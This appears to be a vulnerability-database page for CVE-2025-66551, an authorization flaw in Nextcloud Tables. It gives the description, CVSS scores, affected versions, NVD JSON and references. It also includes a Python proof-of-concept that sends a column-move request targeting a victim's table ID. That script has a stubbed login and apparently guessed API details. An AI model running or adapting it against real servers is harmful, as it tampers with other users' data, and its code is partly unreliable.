Security Vulnerability Report
中文
CVE-2025-66551 CVSS 6.3 MEDIUM

CVE-2025-66551

Published: 2025-12-05 18:15:58
Last Modified: 2025-12-09 17:07:34
Source: [email protected]

Description

Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.6 and 0.9.3, a malicious user was able to create their own table and then move a column to a victims table. This vulnerability is fixed in 0.8.6 and 0.9.3.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:* - VULNERABLE
cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:* - VULNERABLE
Nextcloud Tables < 0.8.6
Nextcloud Tables < 0.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66551 PoC - Nextcloud Tables Column Move Exploitation # This PoC demonstrates how a malicious user can move a column to victim's table import requests import json # Configuration NEXTCLOUD_URL = "https://vulnerable-nextcloud-instance.com" ATTACKER_TOKEN = "attacker_auth_token_here" ATTACKER_TABLE_ID = "attacker_table_id_here" ATTACKER_COLUMN_ID = "column_id_to_move_here" VICTIM_TABLE_ID = "victim_table_id_here" # Step 1: Authenticate as attacker def authenticate(username, password): """Authenticate and get session token""" session = requests.Session() login_url = f"{NEXTCLOUD_URL}/login" # Implementation depends on Nextcloud auth mechanism return session # Step 2: Move column to victim's table def move_column_to_victim(session, column_id, target_table_id): """Move attacker's column to victim's table - the vulnerability exploit""" api_url = f"{NEXTCLOUD_URL}/apps/tables/api/v1/column/move" headers = { "OCS-APIRequest": "true", "Content-Type": "application/json", "Authorization": f"Bearer {ATTACKER_TOKEN}" } # Malicious payload - targeting victim's table payload = { "columnId": column_id, "tableId": target_table_id # Victim's table ID - no ownership check! } response = session.post(api_url, json=payload, headers=headers) if response.status_code == 200: print(f"[SUCCESS] Column {column_id} moved to table {target_table_id}") return True else: print(f"[FAILED] Status: {response.status_code}") print(f"Response: {response.text}") return False # Step 3: Verify the column was moved def verify_column_move(session, column_id): """Verify column is now in victim's table""" api_url = f"{NEXTCLOUD_URL}/apps/tables/api/v1/column/{column_id}" headers = {"OCS-APIRequest": "true", "Authorization": f"Bearer {ATTACKER_TOKEN}"} response = session.get(api_url, headers=headers) if response.status_code == 200: data = response.json() print(f"Column {column_id} now belongs to table: {data.get('tableId')}") if __name__ == "__main__": session = authenticate("attacker_user", "attacker_password") move_column_to_victim(session, ATTACKER_COLUMN_ID, VICTIM_TABLE_ID) verify_column_move(session, ATTACKER_COLUMN_ID)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66551", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:58.300", "lastModified": "2025-12-09T17:07:34.003", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.6 and 0.9.3, a malicious user was able to create their own table and then move a column to a victims table. This vulnerability is fixed in 0.8.6 and 0.9.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:*", "versionStartIncluding": "0.4.0", "versionEndExcluding": "0.8.6", "matchCriteriaId": "DA8A7C61-CBE2-432E-80B0-04F02CE23CE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:*", "versionStartIncluding": "0.9.0", "versionEndExcluding": "0.9.3", "matchCriteriaId": "6648795E-ED71-4554-AEFA-E707CD7AC7E0"}]}]}], "references": [{"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-w787-vwqp-8wr7", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/nextcloud/tables/commit/39f24a62fb41fd7a8bda65325f8bbafdc91c731c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/tables/pull/1810", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://hackerone.com/reports/3137895", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.